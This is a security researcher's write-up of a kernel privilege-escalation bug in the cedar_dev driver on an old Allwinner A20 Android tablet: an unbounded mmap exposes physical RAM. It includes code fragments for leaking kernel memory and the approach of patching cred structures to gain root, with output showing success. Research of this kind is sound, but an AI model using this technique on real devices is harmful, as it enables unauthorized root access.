# The story

Yesterday while I was tidying a closet I found an old android tablet. I do not really know when and how I got this tablet but I know that at that time had no clue with security. So I decided that I would check its security now.

# An obsolete version

This tablet is an Android Lollipop. It is running a Linux kernel 3.3.0. The CPU is a Allwinner `sun7i` ARMv7 SoC (which will have its importance). At that time, there were no SELinux and other fancy hardening (SELinux was introduced on Kitkat). My ROM was already a engineering ROM (rooted). It helped me a lot in my investigations.

Here is an interesting link about this [Allwiner A20 SoC](https://linux-sunxi.org/A20)

# Assessment

One of my first check was to check the char devices. I was escpecially focus on OEM drivers (that are supposed to be less verified). The first condition for an attack is that an unprivileged user can access it.

The following command listed me the char devices exposed:

```
1|shell@android:/ $ find /dev -type c -perm -o+rw -exec ls -alZ {} \;          
crwxrwxrwx system   graphics          - mali
crwxrwxrwx system   graphics          - ump
crwxrwxrwx system   system            - disp
crw-rw-rw- system   system            - cedar_dev
crw-rw-rw- media    media             - sunxi_mem
...
```

After having a quick look on the different drivers and their purpose. I also listed the different operations offered by this char devices.

I found several issues on this drivers. I decided for this write up to focus on `cedar` as the vulnerability I found is really common.

The `cedar_dev` keept my attention. [drivers/media/video/sun7i](https://github.com/amery/linux-sunxi/blob/import/lichee-3.3/a20-dev/drivers/media/video/sun7i/sun7i_cedar.c)

```
static struct file_operations cedardev_fops = {
	.owner   = THIS_MODULE,
	.mmap    = cedardev_mmap,
	.poll    = cedardev_poll,
	.open    = cedardev_open,
	.release = cedardev_release,
	.llseek  = no_llseek,
	.unlocked_ioctl = cedardev_ioctl,
};
```

It offers two calls: `mmap` and `ioctl`.

The mmap call handlers are commonly used to expose MMIO to userland. Lets explain this!

# Paging and MMIO

All userland processes have their own memory address plan (from 0x0 to 0xC0000000). These addresses are virtual (these are not physical addresses).

The MMU is in charge of the address translation (from virtual to physical) when accessing memory. This is based on page tables managed by the Kernel.
 
As physical addresses can be used to access RAM memory areas, it can also be used to access physical devices that exposes registers to the CPU. That is MMIO (Memory Mapped I/O).

![paging](doc/images/paging.png)

You can see the physical mapping in `/proc/iomem`:

```
root@android:/ # cat /proc/iomem                                               
01c02000-01c03000 : sw_dmac.0
01c09000-01c09fff : sunxi_csi0.0
  01c09000-01c09fff : sunxi_csi0.0
01c0a000-01c0afff : disp
01c0c000-01c0cfff : disp
01c0d000-01c0dfff : disp
01c0f000-01c0ffff : sunxi-mmc
01c16000-01c165ff : hdmi
01c1b000-01c1bfff : disp
01c22c00-01c22c40 : sun7i-codec
  01c22c00-01c22c3f : sun7i-codec
01c28000-01c280ff : sw_serial
01c2ac00-01c2afff : sun7i-i2c.0
  01c2ac00-01c2afff : sun7i-i2c.0
01c2b000-01c2b3ff : sun7i-i2c.1
  01c2b000-01c2b3ff : sun7i-i2c.1
01c2b400-01c2b7ff : sun7i-i2c.2
  01c2b400-01c2b7ff : sun7i-i2c.2
01c40000-01c40100 : Mali_GP
01c41000-01c41200 : Mali_L2
01c42000-01c42100 : Mali_PMU
01c43000-01c43100 : Mali_GP_MMU
01c44000-01c44100 : Mali_PP0_MMU
01c45000-01c45100 : Mali_PP1_MMU
01c48000-01c49100 : Mali_PP0
01c4a000-01c4b100 : Mali_PP1
01e00000-01e0077f : disp
01e20000-01e2077f : disp
01e40000-01e457ff : disp
01e60000-01e657ff : disp
01e80000-01e90000 : g2d
  01e80000-01e90000 : g2d
40000000-43ffffff : System RAM
  40008000-4068cb5b : Kernel code
  406ba000-4084ce53 : Kernel data
4f400000-7fffffff : System RAM
```
You can see here, several MMIO regions. RAM begins at `0x40000000`.

# Cedar kernel driver

It is common for char devices to directly exposes MMIO through the MMAP call handler. This the case of the `cedar_dev` char device.

```
static struct file_operations cedardev_fops = {
        .owner   = THIS_MODULE,
        .mmap    = cedardev_mmap,
...
```

As you can see in this function the handler is using a `vm_area_struct` wich correspond to the parameters provided by `mmap` call.([sun7i_cedar.c](https://github.com/amery/linux-sunxi/blob/import/lichee-3.3/a20-dev/drivers/media/video/sun7i/sun7i_cedar.c#L761))

The call in userland:

```
void *mmap(void *addr, size_t length, int prot, int flags,
                  int fd, off_t offset);
```

Is handled in kernel space by:

```
static int cedardev_mmap(struct file *filp, struct vm_area_struct *vma)
```

According to the descriptions, the purpose of this `mmap` is to expose the `Media ACCeleration MMIOs` to the userland.

In order to do it the driver calls [remap_pfn_range](https://www.kernel.org/doc/htmldocs/kernel-api/API-remap-pfn-range.html) API. 

According to the documentation, it aims to remap kernel memory to the userspace:

```
int remap_pfn_range (	struct vm_area_struct * vma,
 	unsigned long addr,
 	unsigned long pfn,
 	unsigned long size,
 	pgprot_t prot);
```

# The vulnerabilitries

## Access control

It is important to constrained memory areas exposed to the userland. In this case giving the ability to the whole system to deals with media acceleration can be an issue. Thus it is important to have adequat permissions on the char device. 

Kernel capabilities can also be a good approach in order to control usage of sensitive resources.

## Bound

You can find the source code here:

[https://github.com/amery/linux-sunxi/blob/import/lichee-3.3/a20-dev/drivers/media/video/sun7i/sun7i_cedar.c#L761](https://github.com/amery/linux-sunxi/blob/import/lichee-3.3/a20-dev/drivers/media/video/sun7i/sun7i_cedar.c#L761)

In `cedardev_mmap` the physical address is defined depending on the mmap offset parameter.

```
	if (VAddr == (unsigned int)addrs.regs_macc) {
		temp_pfn = MACC_REGS_BASE >> 12;
```

`regs_macc` can be leaked with ioctl ([cedardev_ioctl()](https://github.com/amery/linux-sunxi/blob/import/lichee-3.3/a20-dev/drivers/media/video/sun7i/sun7i_cedar.c#L668)) but the other branch (`else`) also allows the exploitation.

Then the `remap_pfn_range` is done based on the `length` of the mmap.

```
	if (remap_pfn_range(vma, vma->vm_start, temp_pfn,
		vma->vm_end - vma->vm_start, vma->vm_page_prot))
```

There is no bound check on the `size` parameter it is then possible to map the entire physical memory to the userland.

![vulnerability](doc/images/vuln.png)

# Exploitation

## Verify assumptions

In order to check the vulnerability. We are going to check that we can mmap a large enough memory space and target a memory address in order to leak it.

The first step is to get `regs_macc` value. By doing that we going to force the remap to `MACC_REGS_BASE` physical address. `MACC_REGS_BASE` is hardcoded and low (its value is `0x01c0e000`). it will helped us in the exploitation.

```
struct cedarv_env_infomation{
        unsigned int phymem_start;
        int  phymem_total_size;
        unsigned int  address_macc;
};

void main(){
  ...
  struct cedarv_env_infomation env_info;
  ...

  ioctl(fd, 0x101, &env_info);
  printf("[+] got regs_macc at %p\n", env_info.address_macc);
  ...
}
```

We will then `mmap` with a large length:

```
#define RAM_END 0x43ffffff
#define BASE 0x01c0e000

void main(){
   ...
   map_ptr = mmap(NULL, RAM_END-BASE, PROT_READ|PROT_WRITE, MAP_FILE|MAP_SHARED, fd, env_info.address_macc);
}
```

Check if we can leak the `linux_banner`.

```
root@android:/ # echo 0 > /proc/sys/kernel/kptr_restrict
root@android:/ # grep linux_banner /proc/kallsyms                              
c04ac0a9 R linux_banner
```

The physical offset of `linux_banner` should be at `0x40000000 + 0x004ac0a9`.

```
#define LINUX_BANNER 0x404ac0a9

void main(){
  ...
  displaymem(map_ptr+LINUX_BANNER-BASE);
}
```

After compilation we push the binary onto the linux and then:

```
shell@android:/ $ /data/local/tmp/leak_linux                                   
[+] opening cedar_dev: 3
[+] got regs_macc at 0xf0034000
[+] mmap 0x74bd0000
Start leaking RAM
b346e0a9: 4c 69 6e 75 78 20 76 65 72 73 69 6f 6e 20 33 2e Linux version 3.
...
```

It works! Now we are going to weaponize it.

## Getting r00t

My approach was a very simple one. I decided to walk on the whole RAM looking for the linux [cred structure](https://github.com/amery/linux-sunxi/blob/import/lichee-3.3/a20-dev/include/linux/cred.h#L116).

If the cred matches to my current user I rewrite the `uids` and `gids` to `0 (root)`. I also rewrite the capabilities.

```
shell@android:/ $ /data/local/tmp/exploit                                  
[.] UID=2000 GID=2000
[+] opening cedar_dev: 3
[+] got regs_macc at 0xf0034000
[+] mmap 0x38b76000
[.] Start walking on RAM
[.] Walking on '40000000-43ffffff : System RAM'
[.] Walking on '4f400000-7fffffff : System RAM'
[+] my creds pattern found at 0xa5a61844 (0x6eaf9844)
[!] patching creds
[+] my creds pattern found at 0xa6060cc4 (0x6f0f8cc4)
[!] patching creds
[+] my creds pattern found at 0xa61490c4 (0x6f1e10c4)
[!] patching creds
[+] my creds pattern found at 0xa6149bc4 (0x6f1e1bc4)
[!] patching creds
[+] my creds pattern found at 0xa6309e44 (0x6f3a1e44)
[!] patching creds
[+] ^_^ r00t!
[+] UID=0 GID=0
shell@android:/ $ id
uid=0(root) gid=0(root)
```

